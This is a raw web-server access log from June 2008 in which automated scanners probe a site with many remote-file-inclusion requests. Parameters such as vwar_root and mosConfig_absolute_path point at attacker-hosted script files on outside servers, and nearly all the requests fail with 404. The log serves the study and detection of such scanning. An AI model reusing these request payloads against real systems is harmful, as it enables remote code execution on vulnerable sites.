209.250.234.226 - - [29/Jun/2008:06:08:42 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:08:42 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:08:42 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
216.118.97.213 - - [29/Jun/2008:06:09:08 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.118.97.213 - - [29/Jun/2008:06:09:08 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.118.97.213 - - [29/Jun/2008:06:09:08 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:09:09 -0700] "GET /logs/access_070924.log//modify.php?dir_module=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:09:20 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:09:20 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:09:20 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "summitcircle.com"
89.108.66.182 - - [29/Jun/2008:06:09:20 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.108.66.182 - - [29/Jun/2008:06:09:21 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:09:50 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:09:50 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:09:50 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:09:50 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:09:50 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:09:50 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:09:54 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:09:55 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:10:10 -0700] "GET /logs/access_070826.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:10:10 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:10:11 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:10:24 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:10:24 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:10:24 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:10:24 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:10:25 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
82.145.32.150 - - [29/Jun/2008:06:10:25 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
217.221.183.132 - - [29/Jun/2008:06:10:30 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.118.97.213 - - [29/Jun/2008:06:11:12 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [29/Jun/2008:06:11:12 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.118.97.213 - - [29/Jun/2008:06:11:12 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:11:21 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:11:21 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:11:21 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
61.222.167.228 - - [29/Jun/2008:06:12:01 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "summitcircle.com"
61.222.167.228 - - [29/Jun/2008:06:12:01 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "summitcircle.com"
38.99.249.248 - - [29/Jun/2008:06:12:16 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://latinvidz.com/Joomla/media/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
38.99.249.248 - - [29/Jun/2008:06:12:16 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://latinvidz.com/Joomla/media/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
38.99.249.248 - - [29/Jun/2008:06:12:16 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://latinvidz.com/Joomla/media/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:12:22 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:12:23 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
61.222.167.228 - - [29/Jun/2008:06:12:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
61.222.167.228 - - [29/Jun/2008:06:12:32 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mosaicessential.com/images/response1??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
77.74.196.90 - - [29/Jun/2008:06:12:50 -0700] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://www.wisdomteachers.com/audioblog/flashaudio/07feb/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
217.20.138.101 - - [29/Jun/2008:06:13:02 -0700] "GET /logs/access_071022.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gielow.org/advguestbook/EARTHLINK.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.74.196.90 - - [29/Jun/2008:06:13:05 -0700] "GET /logs/access_071112.log//components/com_forum/download.php?phpbb_root_path=http://www.wisdomteachers.com/audioblog/flashaudio/07feb/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:06:13:30 -0700] "GET /logs/access_071029.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:06:13:30 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:06:13:30 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:06:13:33 -0700] "GET /logs/access_080121.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
212.71.154.105 - - [29/Jun/2008:06:13:33 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:06:13:37 -0700] "GET /logs/access_071029.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:06:13:37 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:06:13:37 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
38.99.249.248 - - [29/Jun/2008:06:14:12 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://latinvidz.com/Joomla/media/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
38.99.249.248 - - [29/Jun/2008:06:14:13 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://latinvidz.com/Joomla/media/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
38.99.249.248 - - [29/Jun/2008:06:14:13 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://latinvidz.com/Joomla/media/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:06:14:54 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:06:14:54 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.13.225.80 - - [29/Jun/2008:06:14:59 -0700] "GET /logs/access_071021.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gocavs.net/sportsphool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:06:15:08 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:06:15:09 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:15:11 -0700] "GET /logs/access_071029.log/mvcw_conver.php?step=1&vwar_root=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:15:11 -0700] "GET /logs/mvcw_conver.php?step=1&vwar_root=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:06:15:15 -0700] "GET /logs/access_071021.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:15:16 -0700] "GET /logs/access_071029.log//mvcw_conver.php?step=1&vwar_root=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:15:16 -0700] "GET /logs//mvcw_conver.php?step=1&vwar_root=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:15:59 -0700] "GET /logs/access_080204.log/lostpasswd.php?env[include_prefix]=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:15:59 -0700] "GET /lostpasswd.php?env[include_prefix]=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:15:59 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
85.17.143.174 - - [29/Jun/2008:06:16:26 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.17.143.174 - - [29/Jun/2008:06:16:26 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.17.143.174 - - [29/Jun/2008:06:16:26 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
74.52.166.162 - - [29/Jun/2008:06:16:33 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
64.27.0.117 - - [29/Jun/2008:06:17:04 -0700] "GET /logs/access_070827.log HTTP/1.1" 200 306699 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:06:17:17 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
69.10.142.104 - - [29/Jun/2008:06:17:17 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:17:30 -0700] "GET //include.php?path[docroot]=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:18:00 -0700] "GET /logs/access_071001.log//mvcw_conver.php?step=1&vwar_root=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:18:00 -0700] "GET /logs/access_071001.log/mvcw_conver.php?step=1&vwar_root=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
189.14.49.138 - - [29/Jun/2008:06:18:05 -0700] "GET /logs/access_080526.log/errors.php?error=http://electrometro.com.ve/wall/xpl/oi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.34.164.35 - - [29/Jun/2008:06:18:06 -0700] "GET /index.php?url=http://www.endureros.com//db/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
80.67.20.109 - - [29/Jun/2008:06:19:14 -0700] "GET /logs/access_080331.log//components/com_flyspray/startdown.php?file=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
80.67.20.109 - - [29/Jun/2008:06:19:14 -0700] "GET //components/com_flyspray/startdown.php?file=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
80.67.20.109 - - [29/Jun/2008:06:19:14 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://middlestreet.org.uk/pivot/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
85.17.143.174 - - [29/Jun/2008:06:19:46 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.bicarabuku.com/mambots/system/sql.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:21:06 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
213.184.200.43 - - [29/Jun/2008:06:21:24 -0700] "GET /logs/access_071022.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:06:21:25 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.184.200.43 - - [29/Jun/2008:06:21:25 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
62.148.169.202 - - [29/Jun/2008:06:21:36 -0700] "GET //poll/png.php?include_path=http://theninjalegion.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "summitcircle.com"
62.148.169.202 - - [29/Jun/2008:06:21:37 -0700] "GET /logs//poll/png.php?include_path=http://theninjalegion.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "summitcircle.com"
62.148.169.202 - - [29/Jun/2008:06:21:46 -0700] "GET /logs//poll/png.php?include_path=http://theninjalegion.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
62.148.169.202 - - [29/Jun/2008:06:21:46 -0700] "GET //poll/png.php?include_path=http://theninjalegion.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
72.29.64.215 - - [29/Jun/2008:06:21:55 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bbmmolist.com//alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:22:07 -0700] "GET /logs/access_071111.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:22:07 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:22:07 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
64.27.0.117 - - [29/Jun/2008:06:22:17 -0700] "GET /logs/access_070813.log HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
65.55.208.24 - - [29/Jun/2008:06:22:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
65.55.208.24 - - [29/Jun/2008:06:22:29 -0700] "GET /logs/access_070827.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:22:38 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:23:04 -0700] "GET /logs/access_071224.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:23:04 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
217.160.76.187 - - [29/Jun/2008:06:23:05 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infrosul.com.br/adsnew/language/polish/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
